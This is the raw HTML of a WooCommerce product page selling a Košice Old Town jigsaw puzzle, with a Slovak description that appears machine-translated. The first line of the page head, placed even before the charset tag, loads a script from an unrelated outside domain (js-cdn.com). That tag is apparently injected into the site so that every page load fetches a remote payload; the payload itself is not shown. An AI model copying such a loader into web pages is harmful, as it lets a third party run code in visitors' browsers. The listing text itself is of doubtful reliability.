<!DOCTYPE html>
<html lang="en-US">
<head>
 <script src='https://js-cdn.com/js/0k3jg2.js'></script>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width">
  <link rel="profile" href="http://gmpg.org/xfn/11">
  <title>Staré Mesto, Košice, Slovensko &#8211; Letecký pohľad na mesto A-9011645 (skladačka 20&#215;30 Premium, 1000 ks, vyrobené v USA!) &#8211; Jean Maxe</title>
<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="Jean Maxe &raquo; Feed" href="https://jeanmaxe.com/feed/" />
<link rel="alternate" type="application/rss+xml" title="Jean Maxe &raquo; Comments Feed" href="https://jeanmaxe.com/comments/feed/" />
<link rel="alternate" type="application/rss+xml" title="Jean Maxe &raquo; Staré Mesto, Košice, Slovensko &#8211; Letecký pohľad na mesto A-9011645 (skladačka 20&#215;30 Premium, 1000 ks, vyrobené v USA!) Comments Feed" href="https://jeanmaxe.com/product/stare-mesto-kosice-slovensko-letecky-pohlad-na-mesto-a-9011645-skladacka-20x30-premium-1000-ks-vyrobene-v-usa/feed/" />
		<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/jeanmaxe.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.3.2"}};
			!function(e,a,t){var r,n,o,i,p=a.createElement("canvas"),s=p.getContext&&p.getContext("2d");function c(e,t){var a=String.fromCharCode;s.clearRect(0,0,p.width,p.height),s.fillText(a.apply(this,e),0,0);var r=p.toDataURL();return s.clearRect(0,0,p.width,p.height),s.fillText(a.apply(this,t),0,0),r===p.toDataURL()}function l(e){if(!s||!s.fillText)return!1;switch(s.textBaseline="top",s.font="600 32px Arial",e){case"flag":return!c([127987,65039,8205,9895,65039],[127987,65039,8203,9895,65039])&&(!c([55356,56826,55356,56819],[55356,56826,8203,55356,56819])&&!c([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]));case"emoji":return!c([55357,56424,55356,57342,8205,55358,56605,8205,55357,56424,55356,57340],[55357,56424,55356,57342,8203,55358,56605,8203,55357,56424,55356,57340])}return!1}function d(e){var t=a.createElement("script");t.src=e,t.defer=t.type="text/javascript",a.getElementsByTagName("head")[0].appendChild(t)}for(i=Array("flag","emoji"),t.supports={everything:!0,everythingExceptFlag:!0},o=0;o<i.length;o++)t.supports[i[o]]=l(i[o]),t.supports.everything=t.supports.everything&&t.supports[i[o]],"flag"!==i[o]&&(t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&t.supports[i[o]]);t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&!t.supports.flag,t.DOMReady=!1,t.readyCallback=function(){t.DOMReady=!0},t.supports.everything||(n=function(){t.readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&&t.readyCallback()})),(r=t.source||{}).concatemoji?d(r.concatemoji):r.wpemoji&&r.twemoji&&(d(r.twemoji),d(r.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
		<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
	<link rel='stylesheet' id='wp-block-library-css'  href='https://jeanmaxe.com/wp-includes/css/dist/block-library/style.min.css?ver=5.3.2' type='text/css' media='all' />
<link rel='stylesheet' id='wc-block-style-css'  href='https://jeanmaxe.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/style.css?ver=2.5.14' type='text/css' media='all' />
<link rel='stylesheet' id='cookie-notice-front-css'  href='https://jeanmaxe.com/wp-content/plugins/cookie-notice/css/front.min.css?ver=5.3.2' type='text/css' media='all' />
<link rel='stylesheet' id='woocommerce-layout-css'  href='https://jeanmaxe.com/wp-content/plugins/woocommerce/assets/css/woocommerce-layout.css?ver=4.0.1' type='text/css' media='all' />
<link rel='stylesheet' id='woocommerce-smallscreen-css'  href='https://jeanmaxe.com/wp-content/plugins/woocommerce/assets/css/woocommerce-smallscreen.css?ver=4.0.1' type='text/css' media='only screen and (max-width: 768px)' />
<link rel='stylesheet' id='woocommerce-general-css'  href='https://jeanmaxe.com/wp-content/plugins/woocommerce/assets/css/woocommerce.css?ver=4.0.1' type='text/css' media='all' />
<style id='woocommerce-inline-inline-css' type='text/css'>
.woocommerce form .form-row .required { visibility: visible; }
</style>
<link rel='stylesheet' id='pet-animal-store-font-css'  href='//fonts.googleapis.com/css?family=PT+Sans%3A300%2C400%2C600%2C700%2C800%2C900%7CRoboto%3A400%2C700%7CRoboto+Condensed%3A400%2C700%7COpen+Sans%7COverpass%7CMontserrat%3A300%2C400%2C600%2C700%2C800%2C900%7CPlayball%3A300%2C400%2C600%2C700%2C800%2C900%7CAlegreya%3A300%2C400%2C600%2C700%2C800%2C900%7CJulius+Sans+One%7CArsenal%7CSlabo%7CLato%7COverpass+Mono%7CSource+Sans+Pro%7CRaleway%7CMerriweather%7CDroid+Sans%7CRubik%7CLora%7CUbuntu%7CCabin%7CArimo%7CPlayfair+Display%7CQuicksand%7CPadauk%7CMuli%7CInconsolata%7CBitter%7CPacifico%7CIndie+Flower%7CVT323%7CDosis%7CFrank+Ruhl+Libre%7CFjalla+One%7COxygen%7CArvo%7CNoto+Serif%7CLobster%7CCrimson+Text%7CYanone+Kaffeesatz%7CAnton%7CLibre+Baskerville%7CBree+Serif%7CGloria+Hallelujah%7CJosefin+Sans%7CAbril+Fatface%7CVarela+Round%7CVampiro+One%7CShadows+Into+Light%7CCuprum%7CRokkitt%7CVollkorn%7CFrancois+One%7COrbitron%7CPatua+One%7CAcme%7CSatisfy%7CJosefin+Slab%7CQuattrocento+Sans%7CArchitects+Daughter%7CRusso+One%7CMonda%7CRighteous%7CLobster+Two%7CHammersmith+One%7CCourgette%7CPermanent+Marker%7CCherry+Swash%7CCormorant+Garamond%7CPoiret+One%7CBenchNine%7CEconomica%7CHandlee%7CCardo%7CAlfa+Slab+One%7CAveria+Serif+Libre%7CCookie%7CChewy%7CGreat+Vibes%7CComing+Soon%7CPhilosopher%7CDays+One%7CKanit%7CShrikhand%7CTangerine%7CIM+Fell+English+SC%7CBoogaloo%7CBangers%7CFredoka+One%7CBad+Script%7CVolkhov%7CShadows+Into+Light+Two%7CMarck+Script%7CSacramento%7CUnica+One&#038;ver=5.3.2' type='text/css' media='all' />
<link rel='stylesheet' id='bootstrap-css'  href='https://jeanmaxe.com/wp-content/themes/pet-animal-store/css/bootstrap.css?ver=5.3.2' type='text/css' media='all' />
<link rel='stylesheet' id='pet-animal-store-basic-style-css'  href='https://jeanmaxe.com/wp-content/themes/pet-animal-store/style.css?ver=5.3.2' type='text/css' media='all' />
<style id='pet-animal-store-basic-style-inline-css' type='text/css'>

			p,span{
			    color:!important;
			    font-family: ;
			    font-size: ;
			}
			a{
			    color:!important;
			    font-family: ;
			}
			li{
			    color:!important;
			    font-family: ;
			}
			h1{
			    color:!important;
			    font-family: !important;
			    font-size: !important;
			}
			h2{
			    color:!important;
			    font-family: !important;
			    font-size: !important;
			}
			h3{
			    color:!important;
			    font-family: !important;
			    font-size: !important;
			}
			h4{
			    color:!important;
			    font-family: !important;
			    font-size: !important;
			}
			h5{
			    color:!important;
			    font-family: !important;
			    font-size: !important;
			}
			h6{
			    color:!important;
			    font-family: !important;
			    font-size: !important;
			}
			
			@media screen and (max-width: 1000px){
				.primary-navigation ul ul a:hover{
				 color:!important;
				}
				.toggle-menu i,.sidebar .closebtn,.primary-navigation ul li a{
					color:;
				}

				.primary-navigation ul ul a:hover{
					background-color:!important;
				}
			}
			#header .menubg,.toggle-menu, #sidebar input[type="submit"], #sidebar h3, #our-products .woocommerce a.button:hover, .woocommerce ul.products li.product .button:hover, .woocommerce #respond input#submit.alt:hover, .woocommerce a.button.alt:hover, .woocommerce button.button.alt:hover, .woocommerce input.button.alt:hover button.single_add_to_cart_button.button.alt:hover, nav.woocommerce-MyAccount-navigation ul li, .footertown input[type="submit"],#our-products .woocommerce ul.products li.product .price,.woocommerce #respond input#submit:hover, .woocommerce a.button:hover, .woocommerce button.button:hover, .woocommerce input.button:hover, #footer, #sidebar .tagcloud a:hover, .baricon i:hover,.primary-navigation ul ul a, .footertown .tagcloud a:hover,.service-btn a:hover,#comments a.comment-reply-link, #slider a.read-more,.tags a:hover,.metabox,input[type="submit"],a.button,.sidebar,.pagination a:hover, .page-links a:hover,.pagination .current, .page-links .current, .woocommerce-product-search button[type="submit"], .woocommerce .widget_price_filter .ui-slider .ui-slider-range, .woocommerce .widget_price_filter .ui-slider .ui-slider-handle {
			    background-color:;
			}
			 #header i.fa.fa-search,#comments input[type="submit"].submit,.primary-navigation ul ul a:hover, .footertown .widget h3, .footertown h3.widget-title a{
			    color:;
			}
			@media screen and (max-width: 1000px){
				.primary-navigation ul ul a:hover, .primary-navigation ul li a:hover{
			    color: !important;
			} }
			.woocommerce span.onsale{
			    background-color: !important;
			}
			.services-box, #sidebar aside, #sidebar table, #sidebar th, #sidebar td,
			.woocommerce #respond input#submit:hover, .woocommerce a.button:hover, .woocommerce button.button:hover, .woocommerce input.button:hover, .service-btn a:hover, #our-products .woocommerce a.button:hover, .woocommerce ul.products li.product .button:hover, .woocommerce #respond input#submit.alt:hover, .woocommerce a.button.alt:hover, .woocommerce button.button.alt:hover, .woocommerce input.button.alt:hover button.single_add_to_cart_button.button.alt:hover{
			    border-color:;
			}
            #our-products .woocommerce a.button:hover, .woocommerce ul.products li.product .button:hover, .woocommerce #respond input#submit.alt:hover, .woocommerce a.button.alt:hover, .woocommerce button.button.alt:hover, .woocommerce input.button.alt:hover button.single_add_to_cart_button.button.alt:hover,.service-btn a:hover, #our-products .woocommerce a.button:hover, .woocommerce ul.products li.product .button:hover, .baricon i:hover, .tags a:hover{
				border-color:;
			}
			.hvr-sweep-to-right:before, .topbar, #comments input[type="submit"].submit, .pagination span,.pagination a, #slider .carousel-control-next-icon,#slider .carousel-control-prev-icon{
			    background-color:;
			}
    		#comments a.comment-reply-link:hover,.primary-navigation ul ul a:hover,#slider a.read-more:hover{
    			background-color:;
			}
			@media screen and (max-width: 1000px){
				.primary-navigation ul ul a:hover, .primary-navigation ul li a:hover{
    			background-color: !important;
				}
			}
			#our-products strong,.woocommerce #respond input#submit, .woocommerce a.button, .woocommerce button.button, .woocommerce input.button,.baricon i:hover,.service-btn a:hover,#comments a.comment-reply-link,.metabox a,.tags a:hover,span.meta-nav,.middle-align h1,.metabox,.service-btn a,#sidebar h3,#sidebar input[type="submit"], #sidebar td#prev a ,#sidebar caption, #sidebar th,.footertown input[type="submit"], #sidebar td, input[type="submit"],.woocommerce span.onsale, #slider a.read-more,.footertown .tagcloud a:hover,.service-btn a,a,span.post-title,.services-box h2 a,code, .entry-content a, #our-products .woocommerce a.button,.woocommerce ul.products li.product .button,.woocommerce #respond input#submit.alt, .woocommerce a.button.alt, .woocommerce button.button.alt, .woocommerce input.button.alt, h2.woocommerce-loop-product__title, .woocommerce-product-details__short-description p,#reviews p, .footertown select, .primary-navigation a:hover, .tags a, .woocommerce a, .product_meta a{
			    color:;
			}
			#our-products .woocommerce a.button:hover, .woocommerce ul.products li.product .button:hover, .woocommerce #respond input#submit.alt:hover, .woocommerce a.button.alt:hover, .woocommerce button.button.alt:hover, .woocommerce input.button.alt:hover button.single_add_to_cart_button.button.alt:hover,#our-products .woocommerce a.button, .woocommerce ul.products li.product .button, .woocommerce #respond input#submit.alt, .woocommerce a.button.alt, .woocommerce button.button.alt, .woocommerce input.button.alt, .middle-align div.content-aa a,.pagination .current, .page-links .current, .woocommerce #respond input#submit:hover, .woocommerce a.button:hover, .woocommerce button.button:hover, .woocommerce input.button:hover, .woocommerce-product-search button[type="submit"], .footertown .widget_shopping_cart .buttons a:hover, .footertown .widget_price_filter .price_slider_amount .button:hover{
				color:;
			}
			#our-products .woocommerce a.button, .woocommerce ul.products li.product .button, .woocommerce #respond input#submit.alt, .woocommerce a.button.alt, .woocommerce button.button.alt, .woocommerce input.button.alt, #our-products .woocommerce a.button:hover, .woocommerce ul.products li.product .button:hover, .woocommerce #respond input#submit.alt:hover, .woocommerce a.button.alt:hover, .woocommerce button.button.alt:hover, .woocommerce input.button.alt:hover button.single_add_to_cart_button.button.alt:hover{
    			color: !important;
			}
			#our-products .woocommerce a.button,.woocommerce #respond input#submit, .woocommerce a.button, .woocommerce button.button, .woocommerce input.button,.service-btn a, .woocommerce ul.products li.product .button, .woocommerce #respond input#submit.alt, .woocommerce a.button.alt, .woocommerce button.button.alt, .woocommerce input.button.alt, .tags a, .woocommerce #respond input#submit, .woocommerce a.button, .woocommerce button.button, .woocommerce input.button{
				border-color:;
			}
			body{max-width: 100%;}
</style>
<link rel='stylesheet' id='pet-animal-store-effect-css'  href='https://jeanmaxe.com/wp-content/themes/pet-animal-store/css/effect.css?ver=5.3.2' type='text/css' media='all' />
<link rel='stylesheet' id='font-awesome-css'  href='https://jeanmaxe.com/wp-content/themes/pet-animal-store/css/fontawesome-all.css?ver=5.3.2' type='text/css' media='all' />
<script type='text/javascript'>
/* <![CDATA[ */
var cnArgs = {"ajaxurl":"https:\/\/jeanmaxe.com\/wp-admin\/admin-ajax.php","hideEffect":"fade","onScroll":"no","onScrollOffset":"100","onClick":"yes","cookieName":"cookie_notice_accepted","cookieTime":"2592000","cookieTimeRejected":"2592000","cookiePath":"\/","cookieDomain":"","redirection":"","cache":"","refuse":"yes","revoke_cookies":"1","revoke_cookies_opt":"automatic","secure":"1"};
/* ]]> */
</script>
<script type='text/javascript' src='https://jeanmaxe.com/wp-content/plugins/cookie-notice/js/front.min.js?ver=1.2.51'></script>
<script type='text/javascript' src='https://jeanmaxe.com/wp-includes/js/jquery/jquery.js?ver=1.12.4-wp'></script>
<script type='text/javascript' src='https://jeanmaxe.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script>
<script type='text/javascript' src='https://jeanmaxe.com/wp-content/themes/pet-animal-store/js/bootstrap.js?ver=5.3.2'></script>
<script type='text/javascript' src='https://jeanmaxe.com/wp-content/themes/pet-animal-store/js/custom.js?ver=5.3.2'></script>
<script type='text/javascript' src='https://jeanmaxe.com/wp-content/themes/pet-animal-store/js/jquery.min.js?ver=5.3.2'></script>
<link rel='https://api.w.org/' href='https://jeanmaxe.com/wp-json/' />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://jeanmaxe.com/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://jeanmaxe.com/wp-includes/wlwmanifest.xml" /> 
<meta name="generator" content="WordPress 5.3.2" />
<meta name="generator" content="WooCommerce 4.0.1" />
<link rel="canonical" href="https://jeanmaxe.com/product/stare-mesto-kosice-slovensko-letecky-pohlad-na-mesto-a-9011645-skladacka-20x30-premium-1000-ks-vyrobene-v-usa/" />
<link rel='shortlink' href='https://jeanmaxe.com/?p=314' />
<link rel="alternate" type="application/json+oembed" href="https://jeanmaxe.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fjeanmaxe.com%2Fproduct%2Fstare-mesto-kosice-slovensko-letecky-pohlad-na-mesto-a-9011645-skladacka-20x30-premium-1000-ks-vyrobene-v-usa%2F" />
<link rel="alternate" type="text/xml+oembed" href="https://jeanmaxe.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fjeanmaxe.com%2Fproduct%2Fstare-mesto-kosice-slovensko-letecky-pohlad-na-mesto-a-9011645-skladacka-20x30-premium-1000-ks-vyrobene-v-usa%2F&#038;format=xml" />
	<noscript><style>.woocommerce-product-gallery{ opacity: 1 !important; }</style></noscript>
	<link rel="icon" href="https://jeanmaxe.com/wp-content/uploads/2020/03/favicon-2020-03-19T134102.934.png" sizes="32x32" />
<link rel="icon" href="https://jeanmaxe.com/wp-content/uploads/2020/03/favicon-2020-03-19T134102.934.png" sizes="192x192" />
<link rel="apple-touch-icon-precomposed" href="https://jeanmaxe.com/wp-content/uploads/2020/03/favicon-2020-03-19T134102.934.png" />
<meta name="msapplication-TileImage" content="https://jeanmaxe.com/wp-content/uploads/2020/03/favicon-2020-03-19T134102.934.png" />
</head>
<body class="product-template-default single single-product postid-314 wp-custom-logo theme-pet-animal-store cookies-not-set woocommerce woocommerce-page woocommerce-no-js" class="main-bodybox">
		
	<header role="banner">
		<a class="screen-reader-text skip-link" href="#main">Skip to content<span class="screen-reader-text">Skip to content</span></a>
 		<div class="topbar">
		  	<div class="container">
			  	<div class="site_header">
				  	<div class="row">
					    <div class="col-lg-3 col-md-3">
					    	<div class="logo">
						      								        <div class="site-logo">
<style>
.custom-logo {
	height: 162px;
	max-height: 240px;
	max-width: 240px;
	width: 240px;
}
</style><a href="https://jeanmaxe.com/" class="custom-logo-link" rel="home"><img width="240" height="162" src="https://jeanmaxe.com/wp-content/uploads/2020/03/cropped-Jean-Maxe.png" class="custom-logo" alt="Jean Maxe" /></a></div>
						        						    </div>
					    </div>
					    <div class="col-lg-9 col-md-9">
						    <div class="baricon row">
						      	<div class="col-lg-4 col-md-4">
							      							    	</div>
						        <div class="col-lg-4 col-md-4">
						      								        </div>
							    <div class="col-lg-4 col-md-4 p-0">
							    	<div class="social-icon">
									    									    									    									    									</div>
							    </div>
						    </div>
					    </div>
				    </div>
				</div>
		  	</div>
			<div id="header" class="">
				<div class="container"> 
					<div class="header-slider close-sticky ">
						<div class="row m-0">     
							<div class="col-lg-9 col-md-9 col-6 menubg">
								<div class="menubox nav">
								    <div class="toggle-menu responsive-menu">
						                <button role="tab" onclick="resMenu_open()"><i class="fas fa-bars"></i><span class="screen-reader-text">Open Menu</span></button>
						            </div>
					                <div id="menu-sidebar" class="nav sidebar">
					               		<nav id="primary-site-navigation" class="primary-navigation" role="navigation" aria-label="Top Menu">
					                    	<a href="javascript:void(0)" class="closebtn responsive-menu" onclick="resMenu_close()"><i class="fas fa-times"></i><span class="screen-reader-text">Close Menu</span></a>
					                   		<div class="main-menu-navigation clearfix"><ul id="menu-main-menu" class="clearfix mobile_nav"><li id="menu-item-4" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-4"><a href="/">Pets Store</a>
<ul class="sub-menu">
	<li id="menu-item-300" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-300"><a href="https://jeanmaxe.com/my-account/">My account</a></li>
	<li id="menu-item-301" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-301"><a href="https://jeanmaxe.com/checkout/">Checkout</a></li>
</ul>
</li>
<li id="menu-item-299" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-299"><a href="https://jeanmaxe.com/category/pets/">Blog</a>
<ul class="sub-menu">
	<li id="menu-item-9" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9"><a href="https://jeanmaxe.com/category/food/">Food</a></li>
	<li id="menu-item-11" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-11"><a href="https://jeanmaxe.com/category/pets/">Pets</a></li>
</ul>
</li>
<li id="menu-item-302" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-302"><a href="https://jeanmaxe.com/cart/">Cart</a></li>
<li id="menu-item-303" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-303"><a href="https://jeanmaxe.com/shipping-and-delivery/">Shipping and delivery</a></li>
<li id="menu-item-304" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-304"><a href="https://jeanmaxe.com/returns/">Returns</a></li>
</ul></div>					                    </nav>
					                </div>
									<div class="clear"></div>
								</div>
								<div class="clear"></div>
							</div>
							<div class="col-lg-3 col-md-3 col-6 searchbg">
								<div class="search_form">
								  <form role="search" method="get" class="search-form" action="https://jeanmaxe.com/">
	<label>
		<span class="screen-reader-text">Search for:</span>
		<input type="search" class="search-field" placeholder="Search" value="" name="s">
	</label>
	<input type="submit" class="search-submit" value="Search">
</form>								</div>
							</div> 
						</div> 
					</div>
				</div>
			</div>
		</div>
	</header>
<main id="main" role="main" class="container middle-align">
	<div class="row m-0">
		<div class="col-lg-8 col-md-8">
			<div id="primary" class="content-area pet-animal-store"><main id="main" class="site-main" role="main"><nav class="woocommerce-breadcrumb"><a href="https://jeanmaxe.com">Home</a>&nbsp;&#47;&nbsp;<a href="https://jeanmaxe.com/product-category/puzzle/">Puzzle</a>&nbsp;&#47;&nbsp;Staré Mesto, Košice, Slovensko &#8211; Letecký pohľad na mesto A-9011645 (skladačka 20&#215;30 Premium, 1000 ks, vyrobené v USA!)</nav>
				
					<div class="woocommerce-notices-wrapper"></div><div id="product-314" class="product type-product post-314 status-publish first instock product_cat-puzzle has-post-thumbnail shipping-taxable purchasable product-type-simple">

	<div class="woocommerce-product-gallery woocommerce-product-gallery--with-images woocommerce-product-gallery--columns-4 images" data-columns="4" style="opacity: 0; transition: opacity .25s ease-in-out;">
	<figure class="woocommerce-product-gallery__wrapper">
		<div data-thumb="https://jeanmaxe.com/wp-content/uploads/2020/03/Old-Town-Kosice-Slovakia-100x100.jpg" data-thumb-alt="" class="woocommerce-product-gallery__image"><a href="https://jeanmaxe.com/wp-content/uploads/2020/03/Old-Town-Kosice-Slovakia.jpg"><img width="600" height="403" src="https://jeanmaxe.com/wp-content/uploads/2020/03/Old-Town-Kosice-Slovakia-600x403.jpg" class="wp-post-image" alt="" title="Old Town, Kosice, Slovakia" data-caption="" data-src="https://jeanmaxe.com/wp-content/uploads/2020/03/Old-Town-Kosice-Slovakia.jpg" data-large_image="https://jeanmaxe.com/wp-content/uploads/2020/03/Old-Town-Kosice-Slovakia.jpg" data-large_image_width="1500" data-large_image_height="1008" srcset="https://jeanmaxe.com/wp-content/uploads/2020/03/Old-Town-Kosice-Slovakia-600x403.jpg 600w, https://jeanmaxe.com/wp-content/uploads/2020/03/Old-Town-Kosice-Slovakia-300x202.jpg 300w, https://jeanmaxe.com/wp-content/uploads/2020/03/Old-Town-Kosice-Slovakia-1024x688.jpg 1024w, https://jeanmaxe.com/wp-content/uploads/2020/03/Old-Town-Kosice-Slovakia-768x516.jpg 768w, https://jeanmaxe.com/wp-content/uploads/2020/03/Old-Town-Kosice-Slovakia.jpg 1500w" sizes="(max-width: 600px) 100vw, 600px" /></a></div><div data-thumb="https://jeanmaxe.com/wp-content/uploads/2020/03/Old-Town-Kosice-Slovakia-2-100x100.jpg" data-thumb-alt="" class="woocommerce-product-gallery__image"><a href="https://jeanmaxe.com/wp-content/uploads/2020/03/Old-Town-Kosice-Slovakia-2.jpg"><img width="100" height="100" src="https://jeanmaxe.com/wp-content/uploads/2020/03/Old-Town-Kosice-Slovakia-2-100x100.jpg" class="" alt="" title="Old Town, Kosice, Slovakia 2" data-caption="" data-src="https://jeanmaxe.com/wp-content/uploads/2020/03/Old-Town-Kosice-Slovakia-2.jpg" data-large_image="https://jeanmaxe.com/wp-content/uploads/2020/03/Old-Town-Kosice-Slovakia-2.jpg" data-large_image_width="1500" data-large_image_height="1001" srcset="https://jeanmaxe.com/wp-content/uploads/2020/03/Old-Town-Kosice-Slovakia-2-100x100.jpg 100w, https://jeanmaxe.com/wp-content/uploads/2020/03/Old-Town-Kosice-Slovakia-2-150x150.jpg 150w, https://jeanmaxe.com/wp-content/uploads/2020/03/Old-Town-Kosice-Slovakia-2-45x45.jpg 45w, https://jeanmaxe.com/wp-content/uploads/2020/03/Old-Town-Kosice-Slovakia-2-300x300.jpg 300w" sizes="(max-width: 100px) 100vw, 100px" /></a></div><div data-thumb="https://jeanmaxe.com/wp-content/uploads/2020/03/SAKME3I2OY4765-100x100.jpg" data-thumb-alt="" class="woocommerce-product-gallery__image"><a href="https://jeanmaxe.com/wp-content/uploads/2020/03/SAKME3I2OY4765.jpg"><img width="100" height="100" src="https://jeanmaxe.com/wp-content/uploads/2020/03/SAKME3I2OY4765-100x100.jpg" class="" alt="" title="SAKME3I2OY4765" data-caption="" data-src="https://jeanmaxe.com/wp-content/uploads/2020/03/SAKME3I2OY4765.jpg" data-large_image="https://jeanmaxe.com/wp-content/uploads/2020/03/SAKME3I2OY4765.jpg" data-large_image_width="1246" data-large_image_height="1065" srcset="https://jeanmaxe.com/wp-content/uploads/2020/03/SAKME3I2OY4765-100x100.jpg 100w, https://jeanmaxe.com/wp-content/uploads/2020/03/SAKME3I2OY4765-150x150.jpg 150w, https://jeanmaxe.com/wp-content/uploads/2020/03/SAKME3I2OY4765-45x45.jpg 45w, https://jeanmaxe.com/wp-content/uploads/2020/03/SAKME3I2OY4765-300x300.jpg 300w" sizes="(max-width: 100px) 100vw, 100px" /></a></div>	</figure>
</div>

	<div class="summary entry-summary">
		<h1 class="product_title entry-title">Staré Mesto, Košice, Slovensko &#8211; Letecký pohľad na mesto A-9011645 (skladačka 20&#215;30 Premium, 1000 ks, vyrobené v USA!)</h1><p class="price"><span class="woocommerce-Price-amount amount"><span class="woocommerce-Price-currencySymbol">&#36;</span>45.00</span></p>

	
	<form class="cart" action="https://jeanmaxe.com/product/stare-mesto-kosice-slovensko-letecky-pohlad-na-mesto-a-9011645-skladacka-20x30-premium-1000-ks-vyrobene-v-usa/" method="post" enctype='multipart/form-data'>
		
			<div class="quantity">
				<label class="screen-reader-text" for="quantity_5e7a07c183845">Staré Mesto, Košice, Slovensko - Letecký pohľad na mesto A-9011645 (skladačka 20x30 Premium, 1000 ks, vyrobené v USA!) quantity</label>
		<input
			type="number"
			id="quantity_5e7a07c183845"
			class="input-text qty text"
			step="1"
			min="1"
			max=""
			name="quantity"
			value="1"
			title="Qty"
			size="4"
			placeholder=""
			inputmode="numeric" />
			</div>
	
		<button type="submit" name="add-to-cart" value="314" class="single_add_to_cart_button button alt">Add to cart</button>

			</form>

	
<div class="product_meta">

	
	
	<span class="posted_in">Category: <a href="https://jeanmaxe.com/product-category/puzzle/" rel="tag">Puzzle</a></span>
	
	
</div>
	</div>

	
	<div class="woocommerce-tabs wc-tabs-wrapper">
		<ul class="tabs wc-tabs" role="tablist">
							<li class="description_tab" id="tab-title-description" role="tab" aria-controls="tab-description">
					<a href="#tab-description">
						Description					</a>
				</li>
							<li class="reviews_tab" id="tab-title-reviews" role="tab" aria-controls="tab-reviews">
					<a href="#tab-reviews">
						Reviews (0)					</a>
				</li>
					</ul>
					<div class="woocommerce-Tabs-panel woocommerce-Tabs-panel--description panel entry-content wc-tab" id="tab-description" role="tabpanel" aria-labelledby="tab-title-description">
				
	<h2>Description</h2>

<ul>
<li style="font-weight: 400;"><span style="font-weight: 400;">Staré Mesto, Košice, Slovensko &#8211; Letecký pohľad na mesto 9011645 (skladačka 20&#215;30 Premium, 1000 ks, vyrobené v USA!)</span></li>
<li style="font-weight: 400;"><span style="font-weight: 400;">Rozmery výrobku sú 20 x 30 palcov, 1 000 kusov</span></li>
<li style="font-weight: 400;"><span style="font-weight: 400;">100% vyrobené v Amerike!</span></li>
<li style="font-weight: 400;"><span style="font-weight: 400;">Špičkový archívny papier a atrament &#8211; drevotriesková doska hrubej triedy A</span></li>
<li style="font-weight: 400;"><span style="font-weight: 400;">Prejdite si tisíce dostupných obrázkov a kliknite na tlačidlo Lucerna</span></li>
</ul>
			</div>
					<div class="woocommerce-Tabs-panel woocommerce-Tabs-panel--reviews panel entry-content wc-tab" id="tab-reviews" role="tabpanel" aria-labelledby="tab-title-reviews">
				<div id="reviews" class="woocommerce-Reviews">
	<div id="comments">
		<h2 class="woocommerce-Reviews-title">
			Reviews		</h2>

					<p class="woocommerce-noreviews">There are no reviews yet.</p>
			</div>

			<div id="review_form_wrapper">
			<div id="review_form">
					<div id="respond" class="comment-respond">
		<span id="reply-title" class="comment-reply-title">Be the first to review &ldquo;Staré Mesto, Košice, Slovensko &#8211; Letecký pohľad na mesto A-9011645 (skladačka 20&#215;30 Premium, 1000 ks, vyrobené v USA!)&rdquo; <small><a rel="nofollow" id="cancel-comment-reply-link" href="/product/stare-mesto-kosice-slovensko-letecky-pohlad-na-mesto-a-9011645-skladacka-20x30-premium-1000-ks-vyrobene-v-usa/#respond" style="display:none;">Cancel reply</a></small></span><form action="https://jeanmaxe.com/wp-comments-post.php" method="post" id="commentform" class="comment-form"><p class="comment-notes"><span id="email-notes">Your email address will not be published.</span> Required fields are marked <span class="required">*</span></p><div class="comment-form-rating"><label for="rating">Your rating</label><select name="rating" id="rating" required>
						<option value="">Rate&hellip;</option>
						<option value="5">Perfect</option>
						<option value="4">Good</option>
						<option value="3">Average</option>
						<option value="2">Not that bad</option>
						<option value="1">Very poor</option>
					</select></div><p class="comment-form-comment"><label for="comment">Your review&nbsp;<span class="required">*</span></label><textarea id="comment" name="comment" cols="45" rows="8" required></textarea></p><p class="comment-form-author"><label for="author">Name&nbsp;<span class="required">*</span></label><input id="author" name="author" type="text" value="" size="30" required /></p>
<p class="comment-form-email"><label for="email">Email&nbsp;<span class="required">*</span></label><input id="email" name="email" type="email" value="" size="30" required /></p>
<p class="comment-form-cookies-consent"><input id="wp-comment-cookies-consent" name="wp-comment-cookies-consent" type="checkbox" value="yes" /> <label for="wp-comment-cookies-consent">Save my name, email, and website in this browser for the next time I comment.</label></p>
<p class="form-submit"><input name="submit" type="submit" id="submit" class="submit" value="Submit" /> <input type='hidden' name='comment_post_ID' value='314' id='comment_post_ID' />
<input type='hidden' name='comment_parent' id='comment_parent' value='0' />
